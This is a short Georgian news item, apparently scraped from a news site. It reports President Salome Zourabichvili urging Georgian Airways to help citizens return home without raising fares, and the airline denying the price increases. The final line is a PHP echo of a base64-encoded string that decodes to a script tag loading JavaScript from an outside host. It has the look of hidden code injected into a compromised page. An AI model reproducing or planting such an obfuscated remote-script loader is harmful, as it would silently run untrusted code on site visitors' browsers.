celsiusi
ავერსი საქკაბელი

 საქართველოს პრეზიდენტი, სალომე ზურაბიშვილი აცხადებს, რომ ქართულმა ავიაკომპანიამ უნდა გამოიჩინოს სოციალური პასუხისმგებლობა და დაეხმაროს საქართველოს მოქალაქეებს, რომ ქვეყანაში უსაფრთხოდ დაბრუნდნენ.

პრეზიდენტის განცხადებას პრესსამსახური ავრცელებს.

„ქართულმა ავიაკომპანიამ ერთხელ მაინც უნდა გამოიჩინოს სოციალური პასუხისმგებლობა და გამოუვალ მდგომარეობაში მყოფი ხალხისათვის დამატებით ბარიერებისა და ფრენებზე ფასების ხელოვნურად გაზრდის ნაცვლად, ამ მძიმე ვითარებაში დაეხმაროს და საშუალება მისცეს საქართველოს მოქალაქეებს, რომ ქვეყანაში უსაფრთხოდ დაბრუნდნენ“, - აღნიშნულია პრეზიდენტის განცხადებაში.

შეგახსენებთ, რომ ცოტახნის წინ „ჯორჯიან ეარვეისის“ პრესცენტრმა განცხადება გაავრცელა, სადაც წერია, რომ ინფორმაცია, ისრაელში განვითარებული მოვლენების გამოყენებით „ჯორჯიან ეარვეისმა“ თითქოსდა ბილეთების ფასები გაზარდა, ყოველგვარ ობიექტურობას მოკლებულია.

ავტორი
მირანდა შურღაია
244
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");